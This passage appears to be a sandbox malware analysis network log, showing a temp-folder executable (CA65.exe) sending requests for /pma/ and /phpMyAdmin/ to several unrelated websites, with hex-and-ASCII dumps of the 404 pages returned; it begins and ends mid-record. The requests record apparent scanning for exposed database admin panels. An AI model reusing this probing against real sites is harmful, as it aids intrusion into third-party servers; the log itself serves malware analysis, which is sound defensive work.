dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="conte
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 2d 70 72 6f 64 75 63 74 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 4b 65 79 77 6f 72 64 52 61 6e 6b 65 72 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 36 2c 30 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 Data Ascii: -product-block"><div class="bn-block"><h1 id="main" class="domain-name">KeywordRanker.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$6,095</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 75 6c 61 72 4a 5f 38 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 6d 69 64 6c 65 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 4b 65 79 77 6f 72 64 52 61 6e 6b Data Ascii: ularJ_8"></div></div></button></div><div class="tablet-block-midle" style="padding-bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=KeywordRank

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
242	192.168.2.4	50991	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	171	OUT	GET /pma/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	877	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: s-maxage=10 Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: PHPSESSID=95k725o8r56plni6v2rurnt9ml; path=/ X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y05DdjSBlH%2F32DHS7xKecGv%2FlE5hO8SwTySVHml%2BS3LmJkaujFyDKnpfNClmfLqJX5Gkx89WXJZ%2FjXRrLvv%2B7qpjFKqfRo02Px5LZDTZPW%2B0Wm8RcXyklDmoDy905fALkpVv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f64bc225a3-MIA
2023-12-22 20:15:07 UTC	492	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 09 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 2000<!DOCTYPE html><html lang="en-US" class="no-js"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 70 62 32 30 32 31 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e Data Ascii: "image/x-icon" href="https://theproducebox.com/wp-content/themes/tpb2021/assets/images/favicon.ico" /> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.7 - https://yoast.com/wordpress/plugin
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 65 6e 5f 42 61 63 6b 67 72 6f 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 38 2f 54 50 42 5f 4c 6f 67 6f 5f 47 72 65 65 6e 5f 42 61 63 6b 67 72 6f 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 37 34 35 2c 22 68 65 69 67 68 74 22 3a 37 34 34 2c 22 63 61 70 74 69 6f 6e 22 3a 22 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 22 7d 2c 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c Data Ascii: en_Background_Small-1.png","contentUrl":"https://theproducebox.com/wp-content/uploads/2021/08/TPB_Logo_Green_Background_Small-1.png","width":745,"height":744,"caption":"The Produce Box"},"image":{"@id":"https://theproducebox.com/#/schema/logo/image/"}}]}<
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 Data Ascii: e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\u
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 Data Ascii: peof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmoji
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e Data Ascii: in: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://theproducebox.com/wp-includes/css/dist/block-library/style.min
2023-12-22 20:15:07 UTC	863	IN	Data Raw: 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 Data Ascii: color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 34 30 30 30 0d 0a 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 Data Ascii: 4000209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-g
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 Data Ascii: ow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: lef
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d Data Ascii: ayout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
243	192.168.2.4	50285	35.197.165.27	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	190	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	698	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/" cache-control: no-cache, must-revalidate, max-age=0 x-cacheable: yes x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.1e5f09d904a9efd2fc928c187452329f,fed_ x-litespeed-cache: miss transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:07 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:07 UTC	670	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 71 75 65 73 74 61 63 63 6f 75 6e 74 69 6e 67 2e 63 6f 6d 2e 61 75 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 Data Ascii: 10000<!DOCTYPE html><html lang="en-US" class="no-js "><head><meta charset="UTF-8" /><link rel="alternate" hreflang="en-US" href="https://www.conquestaccounting.com.au/phpMyAdmin/"/><meta name='robots' content='noindex, follow' /><script type="te
2023-12-22 20:15:08 UTC	14994	IN	Data Raw: 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 38 2f 63 6f 6e 71 75 65 73 74 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e Data Ascii: icon" /><link rel="apple-touch-icon" href="//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/uploads/2016/08/conquest-favicon.png" />... This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 Data Ascii: e{font-size: 1.5em;line-height: 1.6;}</style><link rel='stylesheet' id='contact-form-7-css' href='//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' type='text/css' media='all' /><link rel='st
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e Data Ascii: n.alt:disabled,.button-round a.button.alt:disabled:hover,.button-round a.button.alt:disabled[disabled],.button-round a.button.alt:disabled[disabled]:hover,.button-round button.button.alt.disabled,.button-round button.button.alt.disabled:hover,.button-roun
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 2e 77 70 6d 6c 2d 6c 61 6e 67 75 61 67 65 73 2c 2e 6d 65 6e 75 6f 2d 6e 6f 2d 62 6f 72 64 65 72 73 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 54 6f 70 5f 62 61 72 20 61 2e 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 3a 6e 6f 74 28 2e 68 65 61 64 65 72 2d 63 65 6e 74 65 72 29 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 Data Ascii: -plain #Top_bar .wpml-languages,.menuo-no-borders.header-plain #Top_bar a.action_button{border-width:0}.menuo-right #Top_bar .menu_wrapper{float:right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-crea
2023-12-22 20:15:08 UTC	729	IN	Data Raw: 2d 66 69 78 65 64 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 70 6c 61 69 6e 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 68 6f 70 2d 73 70 6c 69 74 20 23 41 63 74 69 6f 6e 5f 62 61 72 2c 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 20 23 41 63 74 69 6f 6e 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 43 32 43 32 43 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 Data 